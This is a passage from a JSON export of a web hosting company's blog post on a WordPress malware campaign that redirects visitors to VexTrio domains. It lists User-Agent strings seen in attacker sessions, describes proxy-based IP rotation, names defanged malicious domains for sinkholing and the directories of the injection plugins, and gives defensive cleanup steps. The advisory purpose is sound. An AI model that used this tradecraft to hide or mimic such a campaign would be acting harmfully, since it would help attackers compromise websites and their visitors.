NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/88.0.4324.182 Safari\/537.36 Edg\/88.0.705.74\"\n\"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/89.0.4389.114 Safari\/537.36 Edg\/89.0.774.68\"\n\"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.85 Safari\/537.36\"\n\"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\/20100101 Firefox\/62.0\"\n\"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko\/20100101 Firefox\/79.0\"\n\"Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko\/20100101 Firefox\/94.0\"\n\"Mozilla\/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko\/20100101 Firefox\/95.0\"\n\"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; rv:85.0) Gecko\/20100101 Firefox\/85.0\"\n\"Mozilla\/5.0 (Windows NT 6.3; WOW64; Trident\/7.0; rv:11.0) like Gecko\"<\/pre>\n\n\n\n<p>Within a single attacker session, both the User-Agent and the IP address frequently change. For example, the login may come from one IP address, and shortly afterwards a different IP address with a different User-Agent accesses the \/wp-admin\/ URLs. This behavior indicates the use of proxies, which mask the original IP address; recognizing the pattern in your access logs helps you spot these bot sessions.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Steps_Of_Mitigation\"><\/span>Steps Of Mitigation<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>Protect your website from cyber threats by taking proactive measures. Web hosts play a crucial role in safeguarding against malicious activities. By sinkholing the domain names involved in this DNS-based TDS and blocking their associated name servers, such as cloud-stats[.]com, ns1.cloud-stats[.]com, and ns2.cloud-stats[.]com, the risk can be significantly reduced.<\/p>\n\n\n\n<p>As a website owner, here&#8217;s what you can do to fortify your site:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Strengthen your WordPress admin passwords with unique and robust credentials for each account.<\/li>\n\n\n\n<li>Regularly check for unfamiliar WordPress users and remove them promptly through the WordPress dashboard or database inspection.<\/li>\n\n\n\n<li>If you&#8217;re using the WPCode plugin, thoroughly examine all installed code snippets and delete any that seem suspicious or unnecessary.<\/li>\n\n\n\n<li>Audit all installed plugins to ensure they are legitimate. The injection plugins discussed above live in directories such as insert-headers-and-footers\/ and header-footer\/. Remove any plugins that don&#8217;t belong.<\/li>\n\n\n\n<li>Keep all plugins and themes updated to the latest versions to patch known vulnerabilities. 
If updates aren&#8217;t possible immediately, consider employing a web application firewall for virtual patching.<\/li>\n<\/ul>\n\n\n\n<p>By following these steps, you can bolster your website&#8217;s defenses and keep it safe from potential threats. Stay vigilant and proactive to maintain a secure online presence.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Conclusion\"><\/span>Conclusion<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>Having trouble with your website? Talk to us now! Our skilled security team at ElySpace is available 24\/7 to handle malware problems, clean up your site, and fix it. Contact us anytime for quick help and to get your website working again!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>JavaScript Malware Tactics: There&#8217;s a new harmful campaign attacking WordPress sites. It added dangerous JavaScript code to these sites, which then sent visitors to harmful VexTrio domains. What&#8217;s interesting about this malware is that it used dynamic DNS TXT records from the tracker-cloud[.]com domain to get new redirect URLs. 
Since then, we&#8217;ve observed how the [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":378,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"two_page_speed":[],"footnotes":""},"categories":[14,20,3],"tags":[],"class_list":["post-351","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-security","category-domain-name","category-wordpress"],"acf":[],"_links":{"self":[{"href":"https:\/\/elyspace.com\/blog\/wp-json\/wp\/v2\/posts\/351","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/elyspace.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/elyspace.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/elyspace.com\/blog\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/elyspace.com\/blog\/wp-json\/wp\/v2\/comments?post=351"}],"version-history":[{"count":4,"href":"https:\/\/elyspace.com\/blog\/wp-json\/wp\/v2\/posts\/351\/revisions"}],"predecessor-version":[{"id":979,"href":"https:\/\/elyspace.com\/blog\/wp-json\/wp\/v2\/posts\/351\/revisions\/979"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/elyspace.com\/blog\/wp-json\/wp\/v2\/media\/378"}],"wp:attachment":[{"href":"https:\/\/elyspace.com\/blog\/wp-json\/wp\/v2\/media?parent=351"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/elyspace.com\/blog\/wp-json\/wp\/v2\/categories?post=351"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/elyspace.com\/blog\/wp-json\/wp\/v2\/tags?post=351"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}